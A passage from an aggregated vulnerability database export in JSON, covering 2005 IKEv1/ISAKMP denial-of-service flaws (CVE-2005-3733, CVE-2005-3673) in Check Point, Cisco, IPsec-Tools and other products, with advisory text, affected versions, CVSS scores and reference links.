            "url": "http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html"
          },
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
            "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/cisco-sa-20051114-ipsec-j.shtml"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
            "url": "http://www.symantec.com/region/jp/avcenter/security/content/2005.11.21.html"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.checkpoint.co.jp/"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0267J.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.3,
            "url": "http://jvn.jp/niscc/niscc-273756/index.html"
          },
          {
            "trust": 2.5,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 2.5,
            "url": "http://www.kb.cert.org/vuls/id/226364"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/15402"
          },
          {
            "trust": 1.7,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015203"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/17568"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/17621/"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2005/2410"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17553/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17684/"
          },
          {
            "trust": 0.8,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp"
          },
          {
            "trust": 0.8,
            "url": "http://www.ficora.fi/suomi/tietoturva/varoitukset/varoitus-2005-82.htm"
          },
          {
            "trust": 0.8,
            "url": "http://www.auscert.org.au/5748"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17608/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17668/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17663/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17838/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-3733"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/products/vulnerabilitydisclosures/default.aspx?id=va-20051114-01014.xml"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-3733"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/17902"
          },
          {
            "trust": 0.8,
            "url": "http://www.cyberpolice.go.jp/important/2005/20051118_193244.html"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2005/2410"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3104/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6177/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3587/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6175/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6176/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/552/"
          },
          {
            "trust": 0.1,
            "url": "http://securityresponse.symantec.com/avcenter/security/content/2005.11.21.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/876/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "41734",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2005-11-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2005-11-21T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14941",
            "ident": null
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41734",
            "ident": null
          },
          {
            "date": "2005-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-304",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000686",
            "ident": null
          },
          {
            "date": "2005-11-21T23:03:00",
            "db": "NVD",
            "id": "CVE-2005-3733",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-01-03T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2011-03-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14941",
            "ident": null
          },
          {
            "date": "2006-09-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-304",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000686",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-3733",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Multiple vulnerabilities in Internet Key Exchange (IKE) version 1 implementations",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200511-0019

    Vulnerability from variot - Updated: 2026-03-09 21:53

    The Internet Key Exchange version 1 (IKEv1) implementation in Check Point products allows remote attackers to cause a denial of service via certain crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the “Overview” for the impact of this vulnerability. Check Point Firewall-1 and VPN-1 are prone to denial of service attacks due to unspecified vulnerabilities in the IPSec implementation. The vulnerabilities may be triggered by malformed IKE traffic. Check Point is a network security product manufacturer.

    TITLE: IPsec-Tools ISAKMP IKE Message Processing Denial of Service

    SECUNIA ADVISORY ID: SA17668

    VERIFY ADVISORY: http://secunia.com/advisories/17668/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    SOFTWARE: IPsec-Tools 0.x http://secunia.com/product/3352/

    DESCRIPTION: A vulnerability has been reported in IPsec-Tools, which can be exploited by malicious people to cause a DoS (Denial of Service).

    The vulnerability is caused due to a NULL pointer dereferencing error when processing certain ISAKMP packets in aggressive mode.

    The vulnerability is related to: SA17553

    Successful exploitation requires a weak racoon configuration (e.g. no lifetime proposal or obey mode), and using 3DES/SHA1/DH2.

    SOLUTION: Update to version 0.6.3. http://sourceforge.net/project/showfiles.php?group_id=74601&package_id=74949&release_id=372605

    PROVIDED AND/OR DISCOVERED BY: The vendor credits Adrian Portelli.

    ORIGINAL ADVISORY: http://sourceforge.net/mailarchive/forum.php?thread_id=9017454&forum_id=32000 http://sourceforge.net/project/shownotes.php?release_id=372605&group_id=74601

    OTHER REFERENCES: SA17553: http://secunia.com/advisories/17553/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "vpn-1",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "ngx_r60"
          },
          {
            "_id": null,
            "model": "vpn-1 firewall-1 next generation",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "r55w"
          },
          {
            "_id": null,
            "model": "vpn-1 firewall-1 next generation",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "r55"
          },
          {
            "_id": null,
            "model": "express",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "ci_r57"
          },
          {
            "_id": null,
            "model": "vpn-1 firewall-1 next generation",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "r55p"
          },
          {
            "_id": null,
            "model": "firewall-1",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "vpn-1 firewall-1 next generation",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "checkpoint",
            "version": "r54"
          },
          {
            "_id": null,
            "model": "check point",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "checkpoint",
            "version": "*"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fortinet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openswan linux ipsec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (x86)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r54)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55w)"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.00"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "_id": null,
            "model": "check point",
            "scope": null,
            "trust": 0.6,
            "vendor": "checkpoint",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1/firewall-1 ng with ai r55w",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1/firewall-1 ng with ai r55p",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1/firewall-1 ng with ai r55",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1/firewall-1 ng with ai r54",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 pro ngx r60",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 gx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "point software express ci r57",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15479"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_asa",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:enterprise_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:juniper:screenos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_firewall-1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Discovery is credited to Cisco in cooperation with CERT-FI and NISCC.",
        "sources": [
          {
            "db": "BID",
            "id": "15479"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2005-3673",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-3673",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-14881",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-3673",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#226364",
                "trust": 0.8,
                "value": "16.54"
              },
              {
                "author": "NVD",
                "id": "CVE-2005-3673",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200511-264",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-14881",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The Internet Key Exchange version 1 (IKEv1) implementation in Check Point products allows remote attackers to cause a denial of service via certain crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.  NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. Check Point Firewall-1 and VPN-1 are prone to denial of service attacks due to unspecified vulnerabilities in the IPSec implementation.  The vulnerabilities may be triggered by malformed IKE traffic. Check Point is a network security product manufacturer. \n\nTITLE:\nIPsec-Tools ISAKMP IKE Message Processing Denial of Service\n\nSECUNIA ADVISORY ID:\nSA17668\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17668/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nIPsec-Tools 0.x\nhttp://secunia.com/product/3352/\n\nDESCRIPTION:\nA vulnerability has been reported in IPsec-Tools, which can be\nexploited by malicious people to cause a DoS (Denial of Service). \n\nThe vulnerability is caused due to a NULL pointer dereferencing error\nwhen processing certain ISAKMP packets in aggressive mode. \n\nThe vulnerability is related to:\nSA17553\n\nSuccessful exploitation requires a weak racoon configuration (e.g. no\nlifetime proposal or obey mode), and using 3DES/SHA1/DH2. \n\nSOLUTION:\nUpdate to version 0.6.3. \nhttp://sourceforge.net/project/showfiles.php?group_id=74601\u0026package_id=74949\u0026release_id=372605\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Adrian Portelli. \n\nORIGINAL ADVISORY:\nhttp://sourceforge.net/mailarchive/forum.php?thread_id=9017454\u0026forum_id=32000\nhttp://sourceforge.net/project/shownotes.php?release_id=372605\u0026group_id=74601\n\nOTHER REFERENCES:\nSA17553:\nhttp://secunia.com/advisories/17553/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          },
          {
            "db": "BID",
            "id": "15479"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          }
        ],
        "trust": 2.79
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "SECUNIA",
            "id": "17621",
            "trust": 3.3
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "trust": 3.3
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "15479",
            "trust": 2.8
          },
          {
            "db": "SECTRACK",
            "id": "1015235",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2005-2470",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "17668",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17663",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17838",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17553",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17608",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17684",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2005.0924",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "17902",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41739",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881"
          },
          {
            "db": "BID",
            "id": "15479"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          }
        ]
      },
      "id": "VAR-200511-0019",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-14881"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T21:53:50.690000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
